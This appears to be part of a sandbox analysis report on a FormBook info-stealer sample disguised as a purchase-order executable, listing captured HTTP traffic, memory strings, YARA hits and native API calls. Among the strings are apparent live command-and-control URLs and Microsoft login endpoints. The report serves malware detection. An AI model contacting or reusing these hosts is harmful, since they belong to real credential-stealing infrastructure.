20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 17:16:35 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 17:16:38 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 15 Jan 2025 17:17:17 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 15 Jan 2025 17:17:20 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                      Source: ROUTE.EXE, 00000009.00000002.3541757344.00000000042EC000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000003E3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://maximumgroup.co.za/ktot/?6NWT=ubtLSzl&V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9
                      Source: ROUTE.EXE, 00000009.00000002.3541757344.00000000042EC000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000003E3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://maximumgroup.co.za/ktot/?6NWT=ubtLSzl&V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9
                      Source: PO -2025918.exe, 00000000.00000002.1865271514.000000000279D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: PO -2025918.exe, 00000000.00000002.1879163401.0000000005119000.00000004.00000020.00020000.00000000.sdmp, PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: nWrCyfejRZk.exe, 0000000A.00000002.3543046045.00000000058EC000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.letsbookcruise.xyz
                      Source: nWrCyfejRZk.exe, 0000000A.00000002.3543046045.00000000058EC000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.letsbookcruise.xyz/coi2/
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: ROUTE.EXE, 00000009.00000002.3541757344.0000000003E36000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000003986000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.vh5g.sbs/
                      Source: PO -2025918.exe, 00000000.00000002.1882808937.0000000006842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fasthosts.co.uk/
                      Source: ROUTE.EXE, 00000009.00000002.3541757344.000000000415A000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000003CAA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                      Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: ROUTE.EXE, 00000009.00000002.3540093100.0000000002E1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: ROUTE.EXE, 00000009.00000003.2301997952.0000000007BB6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                      Source: ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.fasthosts.co.uk/icons/favicon.ico
                      Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par
                      Source: ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fasthosts.co.uk/domain-names/search/?domain=$
                      Source: ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.fasthosts.co.uk?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking_do_
                      Source: ROUTE.EXE, 00000009.00000003.2312007593.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: ROUTE.EXE, 00000009.00000002.3543253407.00000000060E0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541757344.0000000004AC6000.00000004.10000000.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3541518277.0000000004616000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-199510482-1

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 4.2.PO -2025918.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.PO -2025918.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2125323216.0000000001A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3540022925.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3539953830.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3543046045.0000000005840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2126495744.0000000002050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3540990423.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_0042C9C3 NtClose,4_2_0042C9C3
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_0040AD20 NtAllocateVirtualMemory,4_2_0040AD20
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2B60 NtClose,LdrInitializeThunk,4_2_01BD2B60
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01BD2DF0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01BD2C70
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD35C0 NtCreateMutant,LdrInitializeThunk,4_2_01BD35C0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD4340 NtSetContextThread,4_2_01BD4340
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD4650 NtSuspendThread,4_2_01BD4650
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2BA0 NtEnumerateValueKey,4_2_01BD2BA0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2B80 NtQueryInformationFile,4_2_01BD2B80
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2BF0 NtAllocateVirtualMemory,4_2_01BD2BF0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2BE0 NtQueryValueKey,4_2_01BD2BE0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2AB0 NtWaitForSingleObject,4_2_01BD2AB0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2AF0 NtWriteFile,4_2_01BD2AF0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2AD0 NtReadFile,4_2_01BD2AD0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2DB0 NtEnumerateKey,4_2_01BD2DB0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2DD0 NtDelayExecution,4_2_01BD2DD0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2D30 NtUnmapViewOfSection,4_2_01BD2D30
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2D10 NtMapViewOfSection,4_2_01BD2D10
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2D00 NtSetInformationFile,4_2_01BD2D00
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2CA0 NtQueryInformationToken,4_2_01BD2CA0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2CF0 NtOpenProcess,4_2_01BD2CF0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2CC0 NtQueryVirtualMemory,4_2_01BD2CC0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2C00 NtQueryInformationProcess,4_2_01BD2C00
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2C60 NtCreateKey,4_2_01BD2C60
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2FB0 NtResumeThread,4_2_01BD2FB0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2FA0 NtQuerySection,4_2_01BD2FA0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2F90 NtProtectVirtualMemory,4_2_01BD2F90
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2FE0 NtCreateFile,4_2_01BD2FE0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2F30 NtCreateSection,4_2_01BD2F30
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2F60 NtCreateProcessEx,4_2_01BD2F60
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2EA0 NtAdjustPrivilegesToken,4_2_01BD2EA0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2E80 NtReadVirtualMemory,4_2_01BD2E80
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2EE0 NtQueueApcThread,4_2_01BD2EE0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD2E30 NtWriteVirtualMemory,4_2_01BD2E30
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD3090 NtSetValueKey,4_2_01BD3090
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD3010 NtOpenDirectoryObject,4_2_01BD3010
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD39B0 NtGetContextThread,4_2_01BD39B0
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD3D10 NtOpenProcessToken,4_2_01BD3D10
                      Source: C:\Users\user\Desktop\PO -2025918.exeCode function: 4_2_01BD3D70 NtOpenThread,4_2_01BD3D70
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03304340 NtSetContextThread,LdrInitializeThunk,9_2_03304340
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03304650 NtSuspendThread,LdrInitializeThunk,9_2_03304650
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302B60 NtClose,LdrInitializeThunk,9_2_03302B60
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_03302BA0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_03302BF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302BE0 NtQueryValueKey,LdrInitializeThunk,9_2_03302BE0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302AF0 NtWriteFile,LdrInitializeThunk,9_2_03302AF0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302AD0 NtReadFile,LdrInitializeThunk,9_2_03302AD0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302F30 NtCreateSection,LdrInitializeThunk,9_2_03302F30
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302FB0 NtResumeThread,LdrInitializeThunk,9_2_03302FB0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302FE0 NtCreateFile,LdrInitializeThunk,9_2_03302FE0
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_03302E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_03302E80
